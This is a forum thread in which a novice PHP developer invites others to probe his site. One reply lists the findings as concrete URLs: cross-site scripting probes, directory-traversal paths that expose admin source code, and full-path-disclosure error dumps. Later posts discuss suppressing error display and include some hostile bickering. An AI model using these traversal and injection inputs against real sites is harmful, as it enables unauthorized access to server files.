Jump to content

Some stuff to test for exploits/etc


speaker219

Recommended Posts

seems ok. I security tested some of the apps (though not super thoroughly) and they're good. Only why do you have a full directory listing script up there?!?!?!?!? not that I could find anything sensitive, but still...

Link to comment
Share on other sites

seems ok. I security tested some of the apps (though not super thoroughly) and they're good. Only why do you have a full directory listing script up there?!?!?!?!? not that I could find anything sensitive, but still...

Gah, i have nothing to  hide ;) and there's some stuff for people to just look around through, nothing dangerous

Link to comment
Share on other sites

http://speaker219.ath.cx:8080/RSS-Reader.php?q=noone

 

Warning: DOMDocument::load() [function.DOMDocument-load]: Empty string supplied as input in D:\xampplite\htdocs\RSS-Reader.php on line 19

Fatal error: Call to a member function getElementsByTagName() on a non-object in D:\xampplite\htdocs\RSS-Reader.php on line 23

 

:)

Link to comment
Share on other sites

Admin Access:

You can view and edit the site's source code through the Directory Transversal in the notes script.

 

Array:

http://speaker219.ath.cx:8080/blog/index.php?waka[]

 

Array:

http://speaker219.ath.cx:8080/blog/test.node?text[]

 

Array:

http://speaker219.ath.cx:8080/Chat/history.php?log[]

 

Cross Site Scripting:

http://speaker219.ath.cx:8080/blog/index.php?waka=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

http://speaker219.ath.cx:8080/blog/test.node?text=<marquee><h1>vulnerable</marquee>

 

Cross Site Scripting:

There is Cross Site Scripting if you submit a note that contains </textarea>code.

 

Cross Site Scripting:

There is Cross Site Scripting on http://speaker219.ath.cx:8080/URL-Encoder/test.php if the URL field contains code.

 

Directory Transversal:

http://speaker219.ath.cx:8080/Chat/history.php?log=1/../../../vulnerable

 

Directory Transversal:

http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/preferences.php

Fatal error: Class 'FileStorage' not found in D:\xampplite\htdocs\Chat\preferences.php on line 6

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/ajax.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/announcement.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/calendar.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/cron.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/editpost.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/external.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/faq.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/forum/forumdisplay.php

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Pics/lolcats/?id[]

Fatal error: Unsupported operand types in D:\xampplite\htdocs\Pics\lolcats\index.php on line 11

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/scripts/test.php?txt[]

Warning: preg_match_all() expects parameter 2 to be string, array given in D:\xampplite\htdocs\scripts\test.php on line 8

Number of upper case letters:

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/RSS-Reader.php?q=a

Warning: DOMDocument::load() [function.DOMDocument-load]: Empty string supplied as input in D:\xampplite\htdocs\RSS-Reader.php on line 19

 

Fatal error: Call to a member function getElementsByTagName() on a non-object in D:\xampplite\htdocs\RSS-Reader.php on line 23

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/history.php?log=2'

Warning: fopen(logs/log.2\'.txt) [function.fopen]: failed to open stream: No such file or directory in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 12

 

Warning: fseek(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 53

 

Warning: file_get_contents(logs/log.2\'.txt) [function.file-get-contents]: failed to open stream: No such file or directory in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 55

 

Warning: ftruncate(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 60

 

Warning: fwrite(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 61

 

Warning: flock() expects parameter 1 to be resource, boolean given in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 44

 

Warning: fclose(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\Chat\php\filestorage.class.php on line 25

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/Chat/cp/bans.php

Fatal error: Call to undefined function ys() in D:\xampplite\htdocs\Chat\cp\bans.php on line 2

 

Full Path Disclosure:

http://speaker219.ath.cx:8080/notes/paste-edit.php

Warning: fread(): supplied argument is not a valid stream resource in D:\xampplite\htdocs\notes\paste-edit.php on line 12

 

PHP Source Code Disclosure:

http://speaker219.ath.cx:8080/notes/paste-edit.php?post=../Chat/admincp.php

Link to comment
Share on other sites

Alright, I fixed alot of those. I'm still pretty new to PHP so I thank you guys for showing me I need to make stuff more secure :)

 

Anyways, I was wondering if it is possible to totally disable full path disclosure? Maybe a setting in php.ini? thanks.

Link to comment
Share on other sites

yeah start making your code better...

Instead of giving a snob response, maybe you could answer my question. I was wondering if there was a setting in php.ini that could fix that problem. I'm not saying my code is so great, but there's no reason for you to be a snob when I ask a simple question. And it's not like i'm the only one -- ever heard of vBulletin? Yeah, there's even bugs in things like that! That's probably a shocker for you. Thanks for all of your wonderful, kind help.

 

Yeah, also, some of the things there with bugs were third party scripts. For example the forum, (vBulletin) the chat script (yShout) I did not create either of those.

Link to comment
Share on other sites

error_reporting(0);

 

 

iHack.

 

Turning off error reporting will also disable error logging. Unless you're retarded, you want to keep logging and reporting (possibly emailing) errors, you just don't want to display them.

 

So, at the risk of being childish and plain unfriendly: please refrain from posting unless you either have a clue or are inquiring.

Link to comment
Share on other sites

yeah start making your code better...

Instead of giving a snob response, maybe you could answer my question. I was wondering if there was a setting in php.ini that could fix that problem. I'm not saying my code is so great, but there's no reason for you to be a snob when I ask a simple question. And it's not like i'm the only one -- ever heard of vBulletin? Yeah, there's even bugs in things like that! That's probably a shocker for you. Thanks for all of your wonderful, kind help.

 

Yeah, also, some of the things there with bugs were third party scripts. For example the forum, (vBulletin) the chat script (yShout) I did not create either of those.

 

Nice comeback !! lol

Link to comment
Share on other sites

If you don't like the company, feel free to leave and never come back any time.

 

I took the time to look at what you've posted here, and I can't say I'm impressed. Most of it is talking down on noobs, and most of it is not exactly friendly.

 

Surely this is going to invoke another of your friendly responses, but go ahead, I expect no less.

 

It's not like you have added ANYTHING of value to this forum. You're just another unfriendly blip on the radar.

 

 

Link to comment
Share on other sites

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.